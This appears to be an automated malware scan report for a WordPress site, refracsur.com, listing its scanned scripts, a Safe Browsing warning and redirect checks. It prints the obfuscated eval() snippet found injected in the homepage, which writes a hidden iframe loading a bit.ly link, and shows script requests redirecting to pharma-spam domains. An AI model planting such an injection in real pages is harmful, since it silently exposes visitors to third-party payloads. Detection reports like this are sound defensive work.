Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=refracsur.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://refracsur.com/ | 200 OK Content-Length: 54297 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3(\'<1 4="5://6.7/8" 9="0" a="0" b="0" c=0 d=0></1>\');',14,14,'|iframe|document|write|src|http|bit|ly|1BC4pKP|width|height|frameborder|marginwidth|marginheight'.split('|'),0,{})) Antivirus reports:
| ||
http://refracsur.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://refracsur.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/themes/centindu/lib/shortcodes-ultimate//js/jplayer/jquery.jplayer.min.js?ver=1 | 200 OK Content-Length: 43668 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/themes/centindu/lib/shortcodes-ultimate//js/init.js?ver=1 | 200 OK Content-Length: 1450 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.0.5&ver=4.1 | 200 OK Content-Length: 64381 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.0.5&ver=4.1 | 200 OK Content-Length: 71799 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/themes/centindu/javascripts/jquery.isotope.min.js?ver=1.2.3 | 200 OK Content-Length: 16045 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/plugins/aqua-page-builder/assets/javascripts/aqpb-view.js?ver=1421762847 | 200 OK Content-Length: 1082 Content-Type: application/javascript | clean |
http://refracsur.com/wp-includes/js/comment-reply.min.js?ver=4.1 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://refracsur.com//refracsur.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.2.10/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 14:07:32 GMT Location: http://2015-best-pharma.com/ Server: Apache Vary: Accept-Encoding Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://2015-best-pharma.com/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 14:07:32 GMT Location: http://curingfirstservices.com Server: nginx Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | clean |
http://curingfirstservices.com/ | 403 Forbidden Content-Length: 168 Content-Type: text/html | clean |
http://curingfirstservices.com/test404page.js | 403 Forbidden Content-Length: 168 Content-Type: text/html | clean |
http://refracsur.com//refracsur.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 14:07:33 GMT Location: http://2015-best-pharma.com/ Server: Apache Vary: Accept-Encoding Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://refracsur.com//refracsur.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.2.10/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 14:07:33 GMT Location: http://2015-best-pharma.com/ Server: Apache Vary: Accept-Encoding Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://refracsur.com//refracsur.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.3.1/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 14:07:33 GMT Location: http://2015-best-pharma.com/ Server: Apache Vary: Accept-Encoding Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://refracsur.com//refracsur.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.2.10/ | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 14:07:33 GMT Location: http://2015-best-pharma.com/ Server: Apache Vary: Accept-Encoding Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://refracsur.com/wp-content/themes/centindu/javascripts/app.js?ver=1.2.3 | 200 OK Content-Length: 1609 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/themes/centindu/javascripts/jquery.prettyPhoto.js?ver=1.2.3 | 200 OK Content-Length: 25216 Content-Type: application/javascript | clean |
http://refracsur.com/wp-content/themes/centindu/javascripts/jquery.fitvids.js?ver=1.2.3 | 200 OK Content-Length: 1441 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: refracsur.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 14:07:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://refracsur.com/>; rel=shortlink
X-Pingback: http://refracsur.com/xmlrpc.php
GET / HTTP/1.1
Host: refracsur.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 14:07:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://refracsur.com/>; rel=shortlink
X-Pingback: http://refracsur.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: refracsur.com
Referer: http://www.google.com/search?q=refracsur.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: refracsur.com
Referer: http://www.google.com/search?q=refracsur.com
Result:
The result is similar to the first query. There are no suspicious redirects found.